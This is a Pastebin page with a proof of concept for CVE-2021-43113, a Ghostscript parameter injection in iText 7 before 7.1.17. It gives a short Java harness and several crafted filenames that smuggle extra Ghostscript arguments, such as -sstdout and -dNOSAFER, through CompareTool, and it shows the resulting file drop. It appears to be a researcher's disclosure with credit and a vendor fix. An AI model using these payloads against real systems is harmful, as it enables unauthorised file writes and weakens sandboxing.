Headline
CVE-2021-43113: iTextPDF7 Parameter Injection PoC - Pastebin.com
iTextPDF in iText before 7.1.17 allows command injection via a CompareTool filename that is mishandled on the gs (aka Ghostscript) command line in GhostscriptHelper.java.
a guest
Nov 14th, 2021
93
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
/*
Title: iTextPDF7 Java Ghostscript Parameter Injection
Software: iTextPDF7 (Java version)
Version: <7.1.17
Vulnerability: Parameter Injection
Credits: Gabriele Zuddas (gzuddas[_@t_]mentat.is)
Description: An attacker controlling the filename passed to the CompareTool class, is able to inject arbitrary parameters in the command line being executed (ghostscript). The vulnerable code resides inside the com/itextpdf/io/util/GhostscriptHelper.java.
Notes: Vendor quickly acknowledged and fixed the vulnerability starting from version 7.1.17 (https://github.com/itext/itext7/releases/tag/7.1.17)
*/
//To compile: javac -cp “.:*” Example.java
//PoC Payload: ITEXT_GS_EXEC=/usr/bin/gs java -cp “.:*” Example 'a.pdf" -sstdout=hi.txt # '
import com.itextpdf.kernel.utils.CompareTool;
//Parameter injection: javac -cp “.:*” Example.java; ITEXT_GS_EXEC=/usr/bin/gs java -cp “.:*” Example “a.pdf\\\” -?"
// javac -cp “.:*” Example.java; ITEXT_GS_EXEC=/usr/bin/gs java -cp “.:*” Example “xxx.pdf\” - \0"
public class Example {
public static void main(String args[]) throws Exception {
CompareTool c \= new CompareTool();c.compareVisually("a.pdf", args\[0\], ".", ".", null);}
}
- //$ITEXT_GS_EXEC -dSAFER -dNOPAUSE -dBATCH -sDEVICE=png16m -r150 -sOutputFile="./cmp_xxx.pdf" - yyyyy-%03d.png" “xxx.pdf” - yyyyy"
- //-dNOSAFER overrides -dSAFER
//javac -cp “.:*” Example.java; ITEXT_GS_EXEC=/usr/bin/gs java -cp “.:*” Example “xxx.pdf\” -sstdout=a.txt"
//DROPS a file called ‘a.txt-%03d.png\ xxx.pdf\ -sstdout=a.txt’ on the filesystem
RAW Paste Data